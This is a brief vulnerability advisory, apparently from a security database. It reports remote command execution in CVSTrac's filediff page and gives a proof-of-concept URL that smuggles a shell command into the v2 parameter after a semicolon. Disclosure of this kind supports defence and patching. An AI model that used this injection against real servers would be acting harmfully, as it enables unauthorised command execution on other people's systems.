CVSTrac filediff Remote Command Execution Vulnerability

CVSTrac filediff Remote Command Execution Vulnerability

No exploit is required to leverage this issue. The following proof of concept has been provided:

http://www.example.com/cvstrac/filediff?f=CVSROOT/rcsinfo&v1=1.1&v2=1.2;w;